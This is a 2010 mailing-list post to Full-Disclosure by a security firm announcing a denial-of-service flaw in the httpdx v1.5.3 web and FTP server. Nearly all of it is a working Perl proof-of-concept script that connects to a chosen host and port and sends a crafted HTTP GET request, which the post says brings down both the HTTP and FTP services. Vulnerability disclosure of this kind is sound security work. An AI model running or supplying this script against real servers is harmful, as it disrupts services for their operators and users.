[<prev] [next>] [day] [month] [year] [list]
Message-ID: <1268666933.2882.17.camel@localhost>
Date: Mon, 15 Mar 2010 16:28:53 +0100
From: Mehdi Mahdjoub - Sysdream IT Security Services <m.mahdjoub@...dream.com>
To: full-disclosure@...ts.grok.org.uk
Cc: submit@...w0rm.com, bugtraq@...urityfocus.com
Subject: Vulnerability httpdx v1.5.3
#!/usr/bin/perl
#
# Program : Httpdx v1.5.3
# PoC : Remote Break Services
# Homepage : http://sourceforge.net/projects/httpdx/
# Found by : Jonathan Salwan
# This Advisory : Jonathan Salwan
# Contact : j.salwan@...dream.com
#
#
# //----- Application description
#
# Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs
# with only few threads. Includes directory listing, virtual hosting, basic auth., support
# for PHP, Perl, Python, SSI, etc. All settings in one config/script file.
#
#
# //----- Description of vulnerability
#
# The vulnerability is caused due to an input validation error when processing HTTP requests. This can be
# exploited to break all services http & ftp.
#
#
#
# //----- Credits
#
# http://www.sysdream.com/article.php?story_id=324§ion_id=78
# http://www.shell-storm.org
#
#
use IO::Socket;
print "\n[x]Httpdx v1.5.3 - Remote Break Services\n";
if (@ARGV < 1)
{
print "[-] Usage: <file.pl> <host> <port>\n";
print "[-] Exemple: file.pl 127.0.0.1 80\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-] Connecting: Failed!\n";
print "[+] Sending request: GET /res~httpdx.conf/image/php.png HTTP/1.1\\r\\nHost: $ip\\r\\n\\r\\n";
$msg = "GET /res~httpdx.conf/image/php.png HTTP/1.1\r\nHost: $ip\r\n\r\n";
$socket->send($msg);
print "\n[+] Done.\n\n";
close($socket);
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists